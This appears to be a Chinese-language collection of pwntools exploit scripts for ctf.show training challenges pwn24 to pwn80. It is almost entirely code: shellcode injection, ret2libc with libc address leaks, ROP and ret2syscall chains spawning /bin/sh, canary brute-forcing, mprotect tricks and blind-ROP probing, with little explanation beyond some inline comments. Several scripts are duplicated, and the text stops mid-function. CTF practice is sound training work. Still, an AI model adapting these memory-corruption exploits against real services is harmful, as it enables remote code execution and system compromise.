注:如对某exp看不懂可以留言
前置基础
pwn24
#coding:utf8
from pwn import *
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28200)
payload = asm(shellcraft.sh())
io.sendline(payload)
io.interactive()
pwn25
from pwn import *
from LibcSearcher import *
# 打印调试信息
context.log_level = 'debug'
# 建立连接
p = remote("pwn.challenge.ctf.show", "28111")
elf = ELF("./pwn")
# 溢出偏移地址
offset = 0x84 + 0x4 + 0x4
# main函数地址
main_addr = elf.symbols['main']
# plt表中puts函数地址
puts_plt = elf.plt['puts']
# got表中puts函数的地址
puts_got = elf.got['puts']
# payload:0x88+0x4个无用填充字符覆盖到返回地址,
# 将puts函数plt表地址做返回地址,代表ctfshow函数执行完会执行puts函数,
# main_addr是puts函数执行完后的返回地址,使用puts函数执行完后回到main函数继续利用溢出漏洞
# puts函数got表中的地址作为puts函数执行的参数,让puts函数输出puts函数在内存的地址
payload = offset * b'a' + p32(puts_plt) + p32(main_addr) + p32(puts_got)
p.sendline(payload)
# 接收puts函数输出的puts函数在内存的地址
puts_addr = u32(p.recv()[0:4])
print(hex(puts_addr))
# 根据内存中puts函数的地址寻找相应的libc版本中puts函数的地址
libc = LibcSearcher("puts", puts_addr)
# 找到libc中的puts函数地址之后,将内存的puts函数地址减去libc中的puts函数地址就得到了libc的基地址
libc_base = puts_addr - libc.dump("puts")
print(hex(libc_base))
# 使用libc.dump("system")找到libc中的system函数地址,再加上基地址就得到system函数在内存的地址
system_addr = libc_base + libc.dump("system")
# 使用libc.dump("str_bin_sh")找到libc中的"/bin/sh"字符串地址,再加上基地址就得到"/bin/sh"字符串在内存的地址
binsh_addr = libc_base + libc.dump("str_bin_sh")
# payload:填充栈空间到返回地址,将返回地址覆盖为system函数的地址
# 然后填充执行system函数之后的返回地址,填充什么都可以,但是长度必须为4
# 最后填入system的参数“/bin/sh”
payload = offset * b'a' + p32(system_addr) + b'a' * 4 + p32(binsh_addr)
p.sendline(payload)
p.interactive()
pwn26
无exp
pwn27
无exp
pwn28
无exp
pwn29
无exp
pwn30
from pwn import *
from LibcSearcher import *
# 打印调试信息
context.log_level = 'debug'
# 建立连接
p = remote("pwn.challenge.ctf.show", "28111")
elf = ELF("./pwn")
# 溢出偏移地址
offset = 0x84 + 0x4 + 0x4
# main函数地址
main_addr = elf.symbols['main']
# plt表中puts函数地址
puts_plt = elf.plt['puts']
# got表中puts函数的地址
puts_got = elf.got['puts']
# payload:0x88+0x4个无用填充字符覆盖到返回地址,
# 将puts函数plt表地址做返回地址,代表ctfshow函数执行完会执行puts函数,
# main_addr是puts函数执行完后的返回地址,使用puts函数执行完后回到main函数继续利用溢出漏洞
# puts函数got表中的地址作为puts函数执行的参数,让puts函数输出puts函数在内存的地址
payload = offset * b'a' + p32(puts_plt) + p32(main_addr) + p32(puts_got)
p.sendline(payload)
# 接收puts函数输出的puts函数在内存的地址
puts_addr = u32(p.recv()[0:4])
print(hex(puts_addr))
# 根据内存中puts函数的地址寻找相应的libc版本中puts函数的地址
libc = LibcSearcher("puts", puts_addr)
# 找到libc中的puts函数地址之后,将内存的puts函数地址减去libc中的puts函数地址就得到了libc的基地址
libc_base = puts_addr - libc.dump("puts")
print(hex(libc_base))
# 使用libc.dump("system")找到libc中的system函数地址,再加上基地址就得到system函数在内存的地址
system_addr = libc_base + libc.dump("system")
# 使用libc.dump("str_bin_sh")找到libc中的"/bin/sh"字符串地址,再加上基地址就得到"/bin/sh"字符串在内存的地址
binsh_addr = libc_base + libc.dump("str_bin_sh")
# payload:填充栈空间到返回地址,将返回地址覆盖为system函数的地址
# 然后填充执行system函数之后的返回地址,填充什么都可以,但是长度必须为4
# 最后填入system的参数“/bin/sh”
payload = offset * b'a' + p32(system_addr) + b'a' * 4 + p32(binsh_addr)
p.sendline(payload)
p.interactive()
pwn31
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
elf = ELF('./pwn')
p = remote('pwn.challenge.ctf.show',28205)
main_addr = int(p.recvline(),16)
base_addr = main_addr - elf.sym['main']
puts_plt = base_addr + elf.plt['puts']
puts_got = base_addr +elf.got['puts']
ctfshow_addr = base_addr + elf.sym['ctfshow']
ebp = base_addr + 0x1fc0
payload = b'a' * 132 + p32(ebp) + b'aaaa' + p32(puts_plt) + p32(ctfshow_addr) + p32(puts_got)
p.sendline(payload)
puts_addr = u32(p.recv(4))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload2 = 132 * b'a' + p32(ebp) + b'aaaa' + p32(system_addr) + p32(ctfshow_addr) + p32(binsh_addr)
p.sendline(payload2)
p.interactive()
pwn32
pwn33
pwn34
栈溢出
pwn35
pwn36
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
elf = ELF('./pwn')
p = remote('pwn.challenge.ctf.show',28205)
main_addr = int(p.recvline(),16)
base_addr = main_addr - elf.sym['main']
puts_plt = base_addr + elf.plt['puts']
puts_got = base_addr +elf.got['puts']
ctfshow_addr = base_addr + elf.sym['ctfshow']
ebp = base_addr + 0x1fc0
payload = b'a' * 132 + p32(ebp) + b'aaaa' + p32(puts_plt) + p32(ctfshow_addr) + p32(puts_got)
p.sendline(payload)
puts_addr = u32(p.recv(4))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload2 = 132 * b'a' + p32(ebp) + b'aaaa' + p32(system_addr) + p32(ctfshow_addr) + p32(binsh_addr)
p.sendline(payload2)
p.interactive()
pwn37
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
p = remote('pwn.challenge.ctf.show',28151)
payload = b'a' * 22 + p32(0x8048521)
p.sendline(payload)
p.interactive()
pwn38
from pwn import *
context(os = 'linux',log_level = 'debug')
p = remote('pwn.challenge.ctf.show',28202)
payload = b'a' * 18 + p64(0x400658)
p.sendline(payload)
p.interactive()
pwn39
from pwn import *
context(os = 'linux',log_level = 'debug')
p = remote('pwn.challenge.ctf.show',28182)
binsh_addr = 0x8048750
system_addr = 0x80483A0
payload = b'a' * 22 + p32(system_addr) + p32(0) + p32(binsh_addr)
p.sendline(payload)
p.interactive()
pwn40
from pwn import *
context(os = 'linux',log_level = 'debug')
p = remote('pwn.challenge.ctf.show',28146)
binsh_addr = 0x400808
poprdi = 0x4007e3
ret = 0x4004fe
system_addr = 0x400520
payload = b'a' * 18 + p64(poprdi) + p64(binsh_addr) + p64(ret) + p64(system_addr)
p.sendline(payload)
p.interactive()
pwn41
from pwn import *
context(os = 'linux',log_level = 'debug')
p = remote('pwn.challenge.ctf.show',28186)
binsh_addr = 0x80487BA
poprdi = 0x4007e3
ret = 0x4004fe
system_addr = 0x80483D0
payload = b'a' * 22 + p32(system_addr) + p32(0) + p32(binsh_addr)
p.sendline(payload)
p.interactive()
pwn42
from pwn import *
context(os = 'linux',log_level = 'debug')
p = remote('pwn.challenge.ctf.show',28255)
binsh_addr = 0x400872
poprdi = 0x400843
ret = 0x40053e
system_addr = 0x400560
payload = b'a' * 18 + p64(poprdi) + p64(binsh_addr) +p64(ret) + p64(system_addr)
p.sendline(payload)
p.interactive()
pwn43
from pwn import *
context(os = 'linux',log_level = 'debug')
p = remote('pwn.challenge.ctf.show',28144)
system_addr = 0x8048450
gets_addr = 0x8048420
buf2 = 0x804B060
payload = b'a' * 112 + p32(gets_addr) + p32(system_addr) + p32(buf2) + p32(buf2)
p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()
pwn44
from pwn import *
context(os = 'linux',log_level = 'debug')
p = remote('pwn.challenge.ctf.show',28165)
system_addr = 0x400520
gets_addr = 0x400530
buf2 = 0x602080
poprdi = 0x4007f3
payload = b'a' * 18 + p64(poprdi) + p64(buf2) + p64(gets_addr) + p64(poprdi) + p64(buf2) + p64(system_addr)
p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()
pwn45
from pwn import *
from LibcSearcher import *
context(os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
p = remote('pwn.challenge.ctf.show',28297)
putsplt = elf.plt['puts']
putsgot = elf.got['puts']
ctf_addr = elf.sym['ctfshow']
payload1 = b'b' * 111 + p32(putsplt) + p32(ctf_addr) + p32(putsgot)
p.sendline(payload1)
puts_addr = u32(p.recvuntil('\xf7')[-4:])
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.dump('puts')
system_addr = base + libc.dump('system')
binsh_addr = base + libc.dump('str_bin_sh')
payload2 = b'a' * 111 + p32(system_addr) + p32(ctf_addr) + p32(binsh_addr)
p.sendline(payload2)
p.interactive()
pwn46
from pwn import *
from LibcSearcher import *
#context(os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show',28269)
putsplt = elf.plt['puts']
putsgot = elf.got['puts']
ctf_addr = elf.sym['ctfshow']
rdi_addr = 0x400803
ret_addr = 0x4004fe
payload1 = b'b' * 120 + p64(rdi_addr) + p64(putsgot) + p64(putsplt) + p64(ctf_addr)
p.sendline(payload1)
#gdb.attach(p)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.dump('puts')
system_addr = base + libc.dump('system')
binsh_addr = base + libc.dump('str_bin_sh')
payload2 = b'a' * 120 + p64(ret_addr) + p64(rdi_addr) + p64(binsh_addr) + p64(system_addr)
p.sendline(payload2)
p.interactive()
pwn47
from pwn import *
from LibcSearcher import *
#context(os = 'linux',log_level = 'debug')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show',28277)
elf = ELF('./pwn')
#gdb.attach(p)
p.recvuntil('puts: ')
puts_addr = int(p.recvuntil("\n" , drop = True),16)
p.recvuntil('gift: ')
binsh_addr = int(p.recvuntil("\n" , drop = True),16)
libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.dump('puts')
system_addr = base + libc.dump('system')
offset = 0x9c +0x4
payload = b'a' * offset + p32(system_addr) + p32(0) + p32(binsh_addr)
p.sendline(payload)
p.interactive()
pwn48
from pwn import *
from LibcSearcher import *
#context(os = 'linux',log_level = 'debug')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show',28260)
elf = ELF('./pwn')
offset = 111
putsplt = elf.plt['puts']
putsgot = elf.got['puts']
ctfshow = elf.sym['ctfshow']
payload = b'a' * offset + p32(putsplt) + p32(ctfshow) + p32(putsgot)
p.recvuntil('O.o?')
p.sendline(payload)
puts_addr = u32(p.recvuntil('\xf7')[-4:])
libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.dump('puts')
system_addr = base + libc.dump('system')
binsh_addr = base + libc.dump('str_bin_sh')
payload2 = b'a' * offset + p32(system_addr) + p32(0) +p32(binsh_addr)
p.sendline(payload2)
p.interactive()
pwn49
from pwn import *
from LibcSearcher import *
#context(os = 'linux',log_level = 'debug')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show',28164)
elf = ELF('./pwn')
offset = 22
mprotect_addr = 0x0806cdd0
popret = 0x0806dfe9
w_addr = 0x080da000 #所修改权限的地址
w_lens = 0x1000 #所修改权限的地址长度
w_auth = 7 #修改权限为可读可写可执行
read_addr = 0x0806bee0
shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
payload = b'a' * offset + p32(mprotect_addr) + p32(popret) #通过将给mprotect所传参数pop出去再ret回来达到让程序继续执行read的目的
payload += p32(w_addr) + p32(w_lens) + p32(w_auth) #mprotect所传参数
payload += p32(read_addr) + p32(w_addr)
payload += p32(0) + p32(w_addr) + p32(len(shellcode))
p.sendline(payload)
p.sendline(shellcode)
p.interactive()
pwn50
from pwn import *
from LibcSearcher import *
#context(os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
#libc = ELF('./libc-2.27.so')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show',28182)
putsplt = elf.plt['puts']
putsgot = elf.got['puts']
main_addr = elf.sym['main']
rdi_addr = 0x4007e3
ret_addr = 0x4004fe
payload1 = b'b' * 40 + p64(rdi_addr) + p64(putsgot) + p64(putsplt) + p64(main_addr)
p.sendlineafter(b'Hello CTFshow\n',payload1)
#gdb.attach(p)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.dump('puts')
system_addr = base + libc.dump('system')
binsh_addr = base + libc.dump('str_bin_sh')
payload2 = b'a' * 40 + p64(ret_addr) + p64(rdi_addr) + p64(binsh_addr) + p64(system_addr)
p.sendline(payload2)
p.interactive()
pwn51
from pwn import *
from LibcSearcher import *
#context(os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
#libc = ELF('./libc-2.27.so')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show',28249)
get_flag = 0x804902E
payload = b"I"*16 + p32(get_flag)
p.sendline(payload)
p.interactive()
pwn52
from pwn import *
from LibcSearcher import *
#context(os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
#libc = ELF('./libc-2.27.so')
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show',28205)
offset = 0x6c + 4
flag_addr = 0x8048586
payload = b"a" * offset + p32(flag_addr) + p32(0) + p32(876) +p32(877)
p.sendline(payload)
p.interactive()
pwn53
from pwn import *
#context.log_level = 'critical'
canary = b''
for i in range(4):
for c in range(0xFF):
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28220)
io.sendlineafter('>','-1')
payload = b'a'*0x20 + canary + p8(c)
io.sendafter('$ ',payload)
io.recv(1)
ans = io.recv()
print(ans)
if b'Canary Value Incorrect!' not in ans:
print('The index({}),value({})'.format(i,c))
canary += p8(c)
break
io.close()
print('canary=',canary)
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28220)
elf = ELF('./pwn')
flag = elf.sym['flag']
payload = b'a'*0x20 + canary + p32(0)*4 + p32(flag)
io.sendlineafter('>','-1')
io.sendafter('$ ',payload)
io.interactive()
pwn54
from pwn import *
#context.log_level = 'debug'
io = remote('pwn.challenge.ctf.show',28202)
#io = process('./pwn')
payload = b'a' *256
io.sendlineafter('Input your Username:',payload)
io.recvuntil(',')
code = io.recvline()
#code.replace(b'/n',b'\x00')
io.sendline(code)
io.close()
io = remote('pwn.challenge.ctf.show',28202)
payload = b'a' *100
io.sendlineafter('Input your Username:',payload)
io.sendline(code)
io.interactive()
pwn55
from pwn import *
#context.log_level = 'debug'
io = remote('pwn.challenge.ctf.show',28272)
elf = ELF('./pwn')
flag = elf.sym['flag']
flag1 = elf.sym['flag_func1']
flag2 = elf.sym['flag_func2']
payload = b'a' *48 + p32(flag1) + p32(flag2) + p32(flag) + p32(0xACACACAC) + p32(0xBDBDBDBD)
io.sendline(payload)
io.interactive()
pwn56
from pwn import *
#context.log_level = 'debug'
io = remote('pwn.challenge.ctf.show',28137)
io.interactive()
pwn57
from pwn import *
#context.log_level = 'debug'
io = remote('pwn.challenge.ctf.show',28173)
io.interactive()
pwn58
from pwn import *
#context.log_level = 'debug'
io = remote('pwn.challenge.ctf.show',28140)
shellcode = asm(shellcraft.sh())
io.sendline(shellcode)
io.interactive()
pwn59
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28140)
shellcode = asm(shellcraft.sh())
io.sendline(shellcode)
io.interactive()
pwn60
from pwn import *
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28103)
buf2 = 0x804A080
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(112,b'a') + p32(buf2)
io.sendline(payload)
io.interactive()
pwn61
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28192)
shellcode = asm(shellcraft.sh())
io.recvuntil('[')
v5_addr = int(io.recvuntil(']',drop=True),16)
print(hex(v5_addr))
payload = b'a' * 0x18 + p64(v5_addr + 0x20) + shellcode
io.sendline(payload)
io.interactive()
pwn62
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28307)
shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
io.recvuntil(b'[')
v5_addr = int(io.recvuntil(b']',drop=True),16)
print(hex(v5_addr))
payload = b'a' * 0x18 + p64(v5_addr + 0x20) + shellcode
io.sendline(payload)
io.interactive()
pwn63
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28279)
shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
io.recvuntil(b'[')
v5_addr = int(io.recvuntil(b']',drop=True),16)
print(hex(v5_addr))
payload = b'a' * 0x18 + p64(v5_addr + 0x20) + shellcode
io.sendline(payload)
io.interactive()
pwn64
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28167)
shellcode = b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
io.recvuntil(b'different')
payload = shellcode
io.sendline(payload)
io.interactive()
pwn65
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28121)
shellcode = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
io.send(shellcode)
io.interactive()
pwn66
from pwn import *
from itertools import *
import re
for i in range(1, 3):
for j in product([p8(k) for k in range(256)], repeat=i):
payload = b"\x00" + b"".join(j)
res = disasm(payload)
if (
res != " ..."
and not re.search(r"\[\w*?\]", res)
and ".byte" not in res
):
print(res)
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28282)
shellcode = b'\x00'+b'\xc0' + asm(shellcraft.sh())
io.sendline(shellcode)
io.interactive()
pwn67
from pwn import *
#context.log_level = 'debug'
context(os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28234)
elf = ELF('./pwn')
shellcode = asm(shellcraft.sh())
io.recvuntil('location: 0x')
position = int(io.recv(8),16)
print('addr:' + hex(position))
payload = b'\x90' * 1336 + shellcode
io.recvuntil('> ')
io.sendline(payload)
io.recvuntil('> ')
io.sendline(hex(position + 0x21 + 668))
io.interactive()
pwn68
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28198)
elf = ELF('./pwn')
shellcode = asm(shellcraft.sh())
io.recvuntil('location: 0x')
position = int(io.recv(12),16)
print('addr:' + hex(position))
payload = b'\x90' * 1336 + shellcode
io.recvuntil('> ')
io.sendline(payload)
io.recvuntil('> ')
io.sendline(hex(position+668+0x10+0x15+8))
io.interactive()
pwn69
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28213)
elf = ELF('./pwn')
mmap = 0x123000
jmp_rsp = 0x400a01
shellcode = shellcraft.open('./ctfshow_flag')
shellcode += shellcraft.read(3,mmap,100)
shellcode += shellcraft.write(1,mmap,100)
shellcode = asm(shellcode)
payload = asm(shellcraft.read(0,mmap,0x100)) + asm("mov rax,0x123000; jmp rax")
payload = payload.ljust(0x28,b'a')
payload += p64(jmp_rsp) + asm("sub rsp,0x30; jmp rsp")
io.recvuntil('do')
io.sendline(payload)
io.sendline(shellcode)
io.interactive()
pwn70
from pwn import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28226)
#io = process('./pwn')
elf = ELF('./pwn')
shellcode = 'push 0;mov r15, 0x67616c66;push r15;mov rdi, rsp;mov rsi, 0;mov rax, 2;syscall;'
shellcode += 'mov r14, 3;mov rdi, r14;mov rsi, rsp;mov rdx, 0xff;mov rax, 0;syscall;'
shellcode += 'mov rdi,1;mov rsi, rsp;mov rdx, 0xff;mov rax, 1;syscall;'
shellcode = asm(shellcode)
io.recvuntil('Welcome,tell me your name:\n')
io.sendline(shellcode)
io.interactive()
pwn71
from pwn import *
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28189)
#io = process('./pwn')
elf = ELF('./pwn')
offsets = 0x70
eax = 0x080bb196
ecxebx = 0x0806eb91
edx = 0x0806eb6a
int80 = 0x08049421 #xi tong diao yong
binsh = 0x080be408
payload = b'a'*offsets + p32(eax) + p32(0xb) +p32(ecxebx) + p32(0) + p32(binsh) + p32(edx) + p32(0) + p32(int80)
io.recvuntil("Try to use ret2syscall!")
io.sendline(payload)
io.interactive()
pwn72
from pwn import *
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28112)
#io = process('./pwn')
elf = ELF('./pwn')
int80 = 0x0806f350
popeax = 0x080bb2c6
popdcb = 0x0806ecb0
addr = 0x080eb000
offset = 44
payload = b'a'*offset + p32(popeax) + p32(3) + p32(popdcb) + p32(0x10) + p32(addr) + p32(0) + p32(int80)
payload += p32(popeax) + p32(0xb) + p32(popdcb) + p32(0) + p32(0) + p32(addr) + p32(int80)
io.recvuntil('where is my system?')
io.sendline(payload)
io.sendline('/bin/sh\x00')
io.interactive()
pwn73
from pwn import *
from struct import pack
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28108)
elf = ELF('./pwn')
p = b'a' * 28
p += pack('<I', int('0x0806f02a',16)) # pop edx ; ret
p += pack('<I', int('0x080ea060',16)) # @ .data
p += pack('<I', int('0x080b81c6',16)) # pop eax ; ret
p += b'/bin'
p += pack('<I', int('0x080549db',16)) # mov dword ptr [edx], eax ; ret
p += pack('<I', int('0x0806f02a',16)) # pop edx ; ret
p += pack('<I', int('0x080ea064',16)) # @ .data + 4
p += pack('<I', int('0x080b81c6',16)) # pop eax ; ret
p += b'//sh'
p += pack('<I', int('0x080549db',16)) # mov dword ptr [edx], eax ; ret
p += pack('<I', int('0x0806f02a',16)) # pop edx ; ret
p += pack('<I', int('0x080ea068',16)) # @ .data + 8
p += pack('<I', int('0x08049303',16)) # xor eax, eax ; ret
p += pack('<I', int('0x080549db',16)) # mov dword ptr [edx], eax ; ret
p += pack('<I', int('0x080481c9',16)) # pop ebx ; ret
p += pack('<I', int('0x080ea060',16)) # @ .data
p += pack('<I', int('0x080de955',16)) # pop ecx ; ret
p += pack('<I', int('0x080ea068',16)) # @ .data + 8
p += pack('<I', int('0x0806f02a',16)) # pop edx ; ret
p += pack('<I', int('0x080ea068',16)) # @ .data + 8
p += pack('<I', int('0x08049303',16)) # xor eax, eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0807a86f',16))# inc eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0807a86f',16)) # inc eax ; ret
p += pack('<I', int('0x0806cc25',16)) # int 0x80
io.sendline(p)
io.interactive()
pwn74
from pwn import *
#from struct import pack
#from LibcSearcher import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28174)
#io = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
one_gadget = 0x10a2fc
io.recvuntil('this:')
printf_addr = int(io.recv(14),16)
print(hex(printf_addr))
#libc = LibcSearcher('printf',printf_addr)
base = printf_addr - libc.symbols['printf']
payload = base + one_gadget
io.sendline(str(payload))
io.interactive()
pwn75
from pwn import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
#context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28267)
#io = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
offsets = 0x24
system_addr = elf.plt['system']
leaveret = 0x08048766
io.recvuntil('codename:')
payload1 = b'a' * offsets + b'stop'
io.send(payload1)
io.recvuntil('stop')
main_ebp = u32(io.recv(4))
print(hex(main_ebp))
buf = main_ebp - 0x38
binsh = buf + 16
payload2 = b'aaaa' + p32(system_addr) + b'aaaa' + p32(binsh) + b'/bin/sh\x00'
payload = payload2.ljust(0x28,b'a') + p32(buf) + p32(leaveret)
io.send(payload)
io.interactive()
pwn76
from pwn import *
from base64 import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
#context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28175)
#io = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
input = 0x811eb40
shell = 0x8049284
payload = b'aaaa' + p32(shell) + p32(input)
payload = base64.b64encode(payload)
io.recvuntil('login:')
io.sendline(payload)
io.interactive()
pwn77
from pwn import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28235)
#io = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
rdiret = 0x4008e3
ret = 0x400576
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
ctfshow = elf.sym['ctfshow']
io.recvuntil('T^T')
offsets = 0x110 - 4
payload = b'a' *offsets + p32(0x110 - 4 + 1) + p64(0) + p64(rdiret) + p64(puts_got) + p64(puts_plt) + p64(ctfshow)
io.sendline(payload)
real_puts = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(real_puts))
libc_base = real_puts - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
for binsh in libc.search('/bin/sh'):
print(hex(binsh))
binsh += libc_base
payload = b'a' * offsets + p32(0x110 - 4 + 1) + p64(0) + p64(rdiret) + p64(binsh) + p64(ret) + p64(system_addr) + p64(ctfshow)
io.sendline(payload)
io.interactive()
pwn78
from pwn import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28148)
#io = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
offsets = 0x58
rax = 0x46b9f8
rdi = 0x4016c3
rsi = 0x4017d7
rdx = 0x4377d5
bss = 0x6c2000
syscall = 0x45bac5
payload = b'a' * offsets + p64(rax) + p64(0)
payload += p64(rdi) + p64(0)
payload += p64(rsi) + p64(bss)
payload += p64(rdx) + p64(0x10)
payload += p64(syscall)
payload += p64(rax) + p64(59)
payload += p64(rdi) + p64(bss)
payload += p64(rsi) + p64(0)
payload += p64(rdx) + p64(0)
payload += p64(syscall)
io.sendline(payload)
io.sendline('/bin/sh\x00')
io.interactive()
pwn79
from pwn import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28253)
#io = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
shellcode = asm(shellcraft.sh())
call_eax = 0x80484a0
payload = shellcode + b'a' * (0x20c - len(shellcode)) + p32(call_eax)
io.recvuntil('input: ')
io.sendline(payload)
io.interactive()
pwn80
from pwn import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
#context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
#elf = ELF('./pwn')
#libc = ELF('./libc.so.6')
def connection():
io = remote('pwn.challenge.ctf.show',28105)
io.recvuntil('Do you know who is daniu?\n')
return io
def try_onegadget(times):
io = connection()
addr = 0x10a2fc
payload = b'a' * times + p64(addr)
io.sendline(payload)
io.interactive()
def get_buf_length():
times = 1
while 1:
try:
io = connection()
payload = 'a' * times
io.send(payload)
data = io.recv()
print(data)
io.close()
if b'No passwd,See you!' not in data:
return times - 1
else:
times += 1
except EOFError:
time += 1
def get_stop_gadget(times):
address = 0x400000
while 1:
try:
io = connection()
